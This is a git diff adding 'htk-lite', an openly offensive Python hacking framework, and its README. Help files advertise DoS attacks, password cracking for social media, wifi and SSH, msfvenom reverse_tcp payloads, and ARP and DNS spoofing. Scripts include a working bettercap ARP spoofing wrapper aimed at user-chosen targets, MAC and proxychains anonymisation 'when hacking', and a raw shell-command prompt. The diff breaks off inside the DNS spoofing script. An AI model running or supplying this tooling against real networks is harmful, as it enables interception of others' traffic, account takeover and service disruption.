diff --git a/README.md b/README.md index 8576f3c..99f262c 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,52 @@ # hackers-tool-kit -Its a framework filled with alot of options and hacking tools you use directly in the script -from brute forcing to payload making im still adding more stuff to see updates check on my instagram @unkn0wn_bali +Its a framework filled with alot of options and hacking tools you use directly in the script from brute forcing to payload making. Im still trying to think of what to add to the script. I now have another tool out called htkl-lite its hackers-tool-kit just not as big and messy. To see updates check on my instagram @tuf_unkn0wn or if there are any problems message me on instagram. +![](tools/screenshot1.png) + +![](tools/screenshot2.png) + +![](tools/screenshot3.png) + +![](tools/screenshot3.5.png) + +![](tools/screenshot4.png) + +![](tools/screenshot5.png) + +![](tools/screenshot6.png) + +![](tools/screenshot7.png) +# install + +* `git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit` + +* `cd hackers-tool-kit` + +* `python install.py` + +# Run + +ROOT IS NOT REQUIRED TO RUN BUT IS RECOMMENDED + +* `cd hackers-tool-kit` + +* `python htk.py` + +# HTK Secure + +![](tools/screenshot4.png) + +the htksecure.py file will run the hackers-tool-kit with proxychains and other tools making you anonymous when hacking but some stuff might be slow or not work... to run htk secure look below + +* `cd hackers-tool-kit` + +* `python htksecure.py` + +# UPDATES +this is where i will try to put the most recent updates + + +* added a htk-lite option which runs my htk-lite tool + + +* added a dns spoofing option diff --git a/htk-lite/commandinfo/anon.txt b/htk-lite/commandinfo/anon.txt new file mode 100644 index 0000000..81d40ed --- /dev/null +++ b/htk-lite/commandinfo/anon.txt @@ -0,0 +1,3 @@ +ANON: + +make yourself anonymous with proxychains and macchanger diff --git a/htk-lite/commandinfo/arpspoof.txt b/htk-lite/commandinfo/arpspoof.txt new file mode 100644 index 0000000..3e60da0 --- /dev/null +++ b/htk-lite/commandinfo/arpspoof.txt @@ -0,0 +1,3 @@ +ARPSPOOF: + +spoof ARP packages on a specific target or targets diff --git a/htk-lite/commandinfo/aserver.txt b/htk-lite/commandinfo/aserver.txt new file mode 100644 index 0000000..96084c9 --- /dev/null +++ b/htk-lite/commandinfo/aserver.txt @@ -0,0 +1,3 @@ +ASERVER: + +start a apache server on your local host and open it up on a browser diff --git a/htk-lite/commandinfo/banner.txt b/htk-lite/commandinfo/banner.txt new file mode 100644 index 0000000..f9acfe5 --- /dev/null +++ b/htk-lite/commandinfo/banner.txt @@ -0,0 +1,3 @@ +BANNER: + +prints out a random banner out of the 6 banners available diff --git a/htk-lite/commandinfo/clear.txt b/htk-lite/commandinfo/clear.txt new file mode 100644 index 0000000..1552dcb --- /dev/null +++ b/htk-lite/commandinfo/clear.txt @@ -0,0 +1,3 @@ +CLEAR: + +clears the screen diff --git a/htk-lite/commandinfo/command.txt b/htk-lite/commandinfo/command.txt new file mode 100644 index 0000000..883b398 --- /dev/null +++ b/htk-lite/commandinfo/command.txt @@ -0,0 +1,3 @@ +COMMAND: + +runs a terminal command from the framework diff --git a/htk-lite/commandinfo/dnsspoof.txt b/htk-lite/commandinfo/dnsspoof.txt new file mode 100644 index 0000000..8e10b68 --- /dev/null +++ b/htk-lite/commandinfo/dnsspoof.txt @@ -0,0 +1,5 @@ +DNSSPOOF: + +Start DNS Spoofing with bettercap to +dns spoof the whole subnet instead of +selecting a target type [dnsspoof --all] diff --git a/htk-lite/commandinfo/dos.txt b/htk-lite/commandinfo/dos.txt new file mode 100644 index 0000000..943fb6d --- /dev/null +++ b/htk-lite/commandinfo/dos.txt @@ -0,0 +1,3 @@ +DOS: + +runs Denial-Of-Service attacks with udp, syn, tcp, etc diff --git a/htk-lite/commandinfo/exit.txt b/htk-lite/commandinfo/exit.txt new file mode 100644 index 0000000..d25bd63 --- /dev/null +++ b/htk-lite/commandinfo/exit.txt @@ -0,0 +1,3 @@ +EXIT: + +exits htk-lite diff --git a/htk-lite/commandinfo/hashid.txt b/htk-lite/commandinfo/hashid.txt new file mode 100644 index 0000000..8ec7254 --- /dev/null +++ b/htk-lite/commandinfo/hashid.txt @@ -0,0 +1,3 @@ +HASHID: + +find out what type of hash a hash is diff --git a/htk-lite/commandinfo/help.txt b/htk-lite/commandinfo/help.txt new file mode 100644 index 0000000..fb3c22c --- /dev/null +++ b/htk-lite/commandinfo/help.txt @@ -0,0 +1,4 @@ +HELP: + +will print out all the commands you can use in the framework +with a cool banner diff --git a/htk-lite/commandinfo/infoscan.txt b/htk-lite/commandinfo/infoscan.txt new file mode 100644 index 0000000..0affe77 --- /dev/null +++ b/htk-lite/commandinfo/infoscan.txt @@ -0,0 +1,6 @@ +INFOSCAN: + +the infoscan command will try to get a bunch +of information from a host like whois, dnslookup, cloudflare, etc +if you type 'infoscan -o' in the framework you can +run a specific scan if you only want to do one of them diff --git a/htk-lite/commandinfo/monitor.txt b/htk-lite/commandinfo/monitor.txt new file mode 100644 index 0000000..5f113a6 --- /dev/null +++ b/htk-lite/commandinfo/monitor.txt @@ -0,0 +1,3 @@ +MONITOR: + +turn monitor mode on and off with airmon-ng diff --git a/htk-lite/commandinfo/netscan.txt b/htk-lite/commandinfo/netscan.txt new file mode 100644 index 0000000..83719fa --- /dev/null +++ b/htk-lite/commandinfo/netscan.txt @@ -0,0 +1,3 @@ +NETSCAN: + +scan for information about your network devices, mac addresses, etc diff --git a/htk-lite/commandinfo/password.txt b/htk-lite/commandinfo/password.txt new file mode 100644 index 0000000..494997c --- /dev/null +++ b/htk-lite/commandinfo/password.txt @@ -0,0 +1,4 @@ +PASSWORD: + +crack passwords for social media, wifi, services like ssh, ftp, etc +using dictionary attacks (require wordlists) diff --git a/htk-lite/commandinfo/payload.txt b/htk-lite/commandinfo/payload.txt new file mode 100644 index 0000000..76d0e58 --- /dev/null +++ b/htk-lite/commandinfo/payload.txt @@ -0,0 +1,4 @@ +PAYLOAD: + +makes a payload with msfvenom these payloads are mostly +reverse_tcp diff --git a/htk-lite/commandinfo/reboot.txt b/htk-lite/commandinfo/reboot.txt new file mode 100644 index 0000000..620b5f9 --- /dev/null +++ b/htk-lite/commandinfo/reboot.txt @@ -0,0 +1,3 @@ +REBOOT: + +reboots the htk-lite script diff --git a/htk-lite/commandinfo/sysinfo.txt b/htk-lite/commandinfo/sysinfo.txt new file mode 100644 index 0000000..3e72f52 --- /dev/null +++ b/htk-lite/commandinfo/sysinfo.txt @@ -0,0 +1,3 @@ +SYSINFO: + +shows information about your device uname, public ip, os, etc diff --git a/htk-lite/commandinfo/terminal.txt b/htk-lite/commandinfo/terminal.txt new file mode 100644 index 0000000..16a7dc6 --- /dev/null +++ b/htk-lite/commandinfo/terminal.txt @@ -0,0 +1,3 @@ +TERMINAL: + +open a new terminal window diff --git a/htk-lite/commandinfo/traff.txt b/htk-lite/commandinfo/traff.txt new file mode 100644 index 0000000..26b59f5 --- /dev/null +++ b/htk-lite/commandinfo/traff.txt @@ -0,0 +1,3 @@ +TRAFF: + +shows internet traffic packages diff --git a/htk-lite/commandinfo/verscan.txt b/htk-lite/commandinfo/verscan.txt new file mode 100644 index 0000000..1483705 --- /dev/null +++ b/htk-lite/commandinfo/verscan.txt @@ -0,0 +1,3 @@ +VERSCAN: + +scan services for their version diff --git a/htk-lite/commandinfo/wordlist.txt b/htk-lite/commandinfo/wordlist.txt new file mode 100644 index 0000000..98f470f --- /dev/null +++ b/htk-lite/commandinfo/wordlist.txt @@ -0,0 +1,3 @@ +WORDLIST: + +make wordlists with cupp for dictionary attacks diff --git a/htk-lite/commandlist/anon-off.py b/htk-lite/commandlist/anon-off.py new file mode 100644 index 0000000..8bd0f89 --- /dev/null +++ b/htk-lite/commandlist/anon-off.py @@ -0,0 +1,53 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def anonoff(): + print "\033[93m------------------------\033[0m" + print "\nSTOPPING MACCHANGER\n" + print "\033[93m------------------------\033[0m" + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) + sys.exit() + reboot() +anonoff() diff --git a/htk-lite/commandlist/anon-on.py b/htk-lite/commandlist/anon-on.py new file mode 100644 index 0000000..1c34acb --- /dev/null +++ b/htk-lite/commandlist/anon-on.py @@ -0,0 +1,55 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def anonon(): + print "\033[93m------------------------\033[0m" + print "\nSTARTING MACCHANGER\n" + print "\033[93m------------------------\033[0m" + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) + show = 'macchanger -s {0}'.format(k) + os.system(show) + os.system('proxychains python htkl.py --quickrun') + +anonon() diff --git a/htk-lite/commandlist/arpspoof.py b/htk-lite/commandlist/arpspoof.py new file mode 100644 index 0000000..d5c7f76 --- /dev/null +++ b/htk-lite/commandlist/arpspoof.py @@ -0,0 +1,51 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("\033[1mTarget/s:\033[0m ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") + +arpspoof() diff --git a/htk-lite/commandlist/aserver.py b/htk-lite/commandlist/aserver.py new file mode 100644 index 0000000..8d17da0 --- /dev/null +++ b/htk-lite/commandlist/aserver.py @@ -0,0 +1,56 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +import socks +import socket +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print "\033[93mStarting Server\033[0m..." + os.system("service apache2 start") + br = raw_input("\033[92mBrowser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("\033[1mhit enter to stop server:\033[0m ") + print "\033[93mStopping Server\033[0m..." + os.system("service apache2 stop") + +aserver() diff --git a/htk-lite/commandlist/banner.py b/htk-lite/commandlist/banner.py new file mode 100644 index 0000000..eecc4ae --- /dev/null +++ b/htk-lite/commandlist/banner.py @@ -0,0 +1,188 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def mainbanner1(): + print """\033[1;36m + ┬ ┬┌┬┐┌─┐\033[0m + │ │ │ ├┤ \033[1;36m + ┴─┘┴ ┴ └─┘ \033[0m +██╗ ██╗████████╗██╗ ██╗ +██║ ██║╚══██╔══╝██║ ██╔╝\033[1;36m +███████║ ██║ █████╔╝ \033[0m +██╔══██║ ██║ ██╔═██╗ +██║ ██║ ██║ ██║ ██╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ + \n""".decode('utf-8') + +def mainbanner2(): + print """ + ░░▒█████████ + ▒▓▓█████████████ + ░▓█████████████████████░ ░▒███▓ + ░▓██████████████████████████████████ + ░░▒▓▓▓███████████┬ ┬┌┬┐┌─┐████████████▓ + ░▓██████▓▓██████████│ │ │ ├┤ █████████████▓░ + ░▓██████▓███████▓██████┴─┘┴ ┴ └─┘████████████████░ + ░░▒░░░░▒▒▒▓▓░░▒███████████████████████████▓▓▓░ + ░░░▒░░░▒▓▓▒░▒▒░▒▓████████▓▓██▒▒░ + ░▒░░░░░░▒░░░░░░░ + \n""".decode('utf-8') + +def mainbanner3(): + print """ +╔═══════════════════════════════════════════════╗ +║ ║ +║ {0} ██░ ██ ▄▄▄█████▓ ██ ▄█▀ ██▓ \033[0m ║ +║ {1} ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ ▓██▒ \033[0m ║ +║ {2} ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ ▒██░ \033[0m ║ +║ {3} ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ ▒██░ \033[0m║ +║ {4} ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄░██████▒ \033[0m║ +║ {5} ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒░ ▒░▓ ░ \033[0m║ +║ {6} ▒ ░▒░ ░ ░ ░ ░▒ ▒░░ ░ ▒ ░ \033[0m║ +║ {7} ░ ░░ ░ ░ ░ ░░ ░ ░ ░ \033[0m║ +║ {8} ░ ░ ░ ░ ░ ░ ░ \033[0m║ +║ ║ +║ ║ +╚═══════════════════════════════════════════════╝ + """.decode('utf-8').format(random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list)) + +def mainbanner4(): + print """\033[0m +████████████████████████████████████████████████████████████████████████████\033[91m +███ ███████ ██ █ ███ ███████ ████████ ██ ████████████\033[33m +████ ███████ ██████ █████ ██ █████████ █ █ █████████ ██ ██ ██████ ███\033[93m +████ █████ ███████ ██████ █████████████ ████████ ███ █████ ████\033[92m +████ ██████ █████ █████████████ ██████ █ █ ██ ██ █ █████ ███\033[94m +████ █████ ███████ ██████ █████████████ █████████ ████ ███ ███\033[1;36m +████ ███████ ███████ ██████ ██ ███████████ █████ ███ ████ ██ █ █████████\033[95m +███ █████ █████ ████ ███ ████████ ██ ███ ████ ███\033[0m +████████████████████████████████████████████████████████████████████████████ + \033[0m\n""".decode('utf-8') + +def mainbanner5(): + print """\033[92m + + █ ▄ ▄ █ ▄███▄ ▄██ ▄███▀ + ███ ███ ▄█████████▄ ███▐██▀ + ███ ███ ██▀▀███▀▀██ █████▀ + ███▄▄▄▄███ ▀ ███ ▀ ██████▄ + ███▀▀▀▀███ ▄ ███ ▄ ███▐██▄ + ███ ███ \033[0m┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ \033[92m███ \033[0m┌─┐┌─┐┬ \033[92m███ ▀███▄ \033[0m┬┌┬┐\033[92m + ███ ███ \033[0m├─┤│ ├┴┐├┤ ├┬┘└─┐ \033[92m███ \033[0m│ ││ ││ \033[92m███ ██ \033[0m│ │ \033[92m + █ █ \033[0m┴ ┴└─┘┴ ┴└─┘┴└─└─┘ \033[92m▀███▀ \033[0m└─┘└─┘┴─┘ \033[92m▀ ▀ \033[0m┴ ┴\033[92m + + + + ███ + █ █ + █ █ ██ ████████ ███████ + █ █ ██ ██ ██ + █ █ ██ ██ █████ + █ █ ▄ ██ ██ ██ + █████▄▄██ ██ ██ ███████ + + + """.decode('utf-8') + +def mainbanner6(): + print """ + • \033[35m▄█\033[0m . \033[35m█▄ \033[0m. \033[35m███ \033[0m. • \033[35m▄█ ▄█▄\033[0m. \033[35m▄█ \033[0m• + \033[35m█#█ █#█\033[0m• \033[35m▀████=████▄\033[0m. \033[35m███ ▄█ █▀ █⇣█ \033[0m. +. \033[35m█#█ \033[0m. •\033[35m█#█ \033[0m. \033[35m▀█-█▀▀██ \033[0m.\033[35m█ █▐ █▀ \033[0m• \033[35m█L█ \033[0m. + \033[35m▄███▄▄▄▄███▄▄ \033[0m. \033[35m█▪█ \033[0m. \033[35m▀ ▄█████▀ \033[0m.\033[35m█i█ +▀▀█+█▀▀▀▀█+█▀ \033[0m• \033[35m█▪█ \033[0m. \033[35m▀▀█ █ █▄\033[0m. \033[35m█t█ \033[0m. + .\033[35m█•█ \033[0m. \033[35m█•█ \033[0m. \033[35m█▪█ \033[0m• \033[35m███▐ █▄ \033[0m. \033[35m█e█ \033[0m. + \033[35m█+█ █+█ \033[0m. \033[35m█▪█ \033[0m. \033[35m█ █\033[0m.\033[35m▀█ █▄ █⇡█▌ \033[0m• \033[35m▄ +\033[0m• \033[35m███ \033[0m.\033[35m█▀ \033[0m. \033[35m ▄████▀ \033[0m. \033[35m███ \033[0m. \033[35m▀█▀ █████▄▄██ + \033[0m . . . . \033[35m▀ \033[0m•\033[35m▀\033[0m] + """.decode('utf-8') +def mainbanner7(): + print """\033[31m +██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ +██║ ██║╚\033[91m══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ +███████║ ██║ █████╔╝████\033[33m█╗██║ ██║ ██║ █████╗ +██╔══██║ ██║ ██╔═██╗╚════╝\033[93m██║ ██║ ██║ ██╔══╝ +██║ ██║ ██║ ██║ ██╗ ███████╗██║ ██║ ███████╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝\033[0m + """.decode('utf-8') + +def mainbanner8(): + print """\033[34m +██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ +██║ ██║╚══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ +███████║ ██║ █████╔╝█████╗█\033[94m█║ ██║ ██║ █████╗ +██╔══██║ ██║ ██╔═██╗╚════╝██║ ██║ ██║ ██╔══╝ +██║ ██║ █\033[1;36m█║ ██║ ██╗ ███████╗██║ ██║ ███████╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝ + \033[0m""".decode('utf-8') + +def mainbanner9(): + print """\033[93m +██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ +██║ ██║╚══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ +███\033[92m████║ ██║ █████╔╝█████╗██║ ██║ ██║ █████╗ +██╔══██║ ██║ ██╔═██╗╚════╝\033[32m██║ ██║ ██║ ██╔══╝ +██║ ██║ ██║ ██║ ██╗ ███████╗██║ ██║ ███████╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝ + \033[0m""".decode('utf-8') + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,9) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + +mainbanner() diff --git a/htk-lite/commandlist/clear.py b/htk-lite/commandlist/clear.py new file mode 100644 index 0000000..d80484e --- /dev/null +++ b/htk-lite/commandlist/clear.py @@ -0,0 +1,2 @@ +import os +os.system("clear") diff --git a/htk-lite/commandlist/command.py b/htk-lite/commandlist/command.py new file mode 100644 index 0000000..22af89e --- /dev/null +++ b/htk-lite/commandlist/command.py @@ -0,0 +1,43 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + +def command(): + command = raw_input("\033[1mCommand:\033[0m ") + os.system(command) +command() diff --git a/htk-lite/commandlist/dnsspoof-all.py b/htk-lite/commandlist/dnsspoof-all.py new file mode 100644 index 0000000..e1f8fbd --- /dev/null +++ b/htk-lite/commandlist/dnsspoof-all.py @@ -0,0 +1,52 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] + 